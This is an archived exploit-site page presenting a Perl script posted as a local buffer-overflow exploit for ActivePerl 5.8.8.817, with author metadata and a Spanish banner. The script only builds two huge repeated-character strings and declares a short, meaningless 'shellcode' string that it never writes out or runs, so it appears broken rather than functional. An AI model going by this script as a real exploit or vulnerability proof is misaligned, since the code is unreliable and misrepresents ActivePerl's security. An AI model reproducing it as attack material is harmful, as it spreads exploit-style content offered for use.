Home / os / win7

ActivePerl v5.8.8.817 Buffer Overflow

Posted on 09 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ActivePerl v5.8.8.817 Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================== ActivePerl v5.8.8.817 Buffer Overflow ===================================== # Title:Local Buffer Overflow ActivePerl v5.8.8.817 # EDB-ID: () # CVE-ID: () # OSVDB-ID: () # Author: PoisonCode # Published: 2010-06-09 # Download Exploit Code # Download Vulnerable app # Title:Local Buffer Overflow ActivePerl v5.8.8.817 # Software Link:http://www.activestate.com # Version: v5.8.8.817 # Platform:Windows # Author: PoisonCode # CVE-ID:() _____ _____ _ _ | __ / ____| (_) | | |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ | ___/ \___ / _ / __| | | | '__| | __| | | | | | ____) | __/ (__| |_| | | | | |_| |_| | |_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | __/ | |___/ Exploit ------------------------------------------- #!/usr/bin/perl # File Name :Local Buffer Overflow ActivePerl # Author :PoisonCode # Exploit Title: Local Buffer Overflow ActivePerl # Date:09/06/2010 # Author:PoisonCode # Site :http://www.activestate.com # Version: 5.8.8.817 # Tested on: Windows $file=&quot;Exploit Perl Version 5.8.8.817&quot;; print &quot; ============================================ &quot;; print &quot; = Local Buffer Overflow ActivePerl = &quot;; print &quot; = Version: 5.8.8.817 = &quot;; print &quot; = Autor:PoisonCode = &quot;; print &quot; = Web :PanamaSecurity.blogspot.com = &quot;; print &quot; ============================================= &quot;; print &quot; &quot;; print &quot; Espere Mientras Trabaja el Exploit &quot;; my $fruty=&quot;x87&quot; x 999999999; my $loops=&quot;x67&quot; x 999999999; my $shellcode=&quot;x00x13xFFxC4x00x10x0axe4x00x08x5bx5d&quot;; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP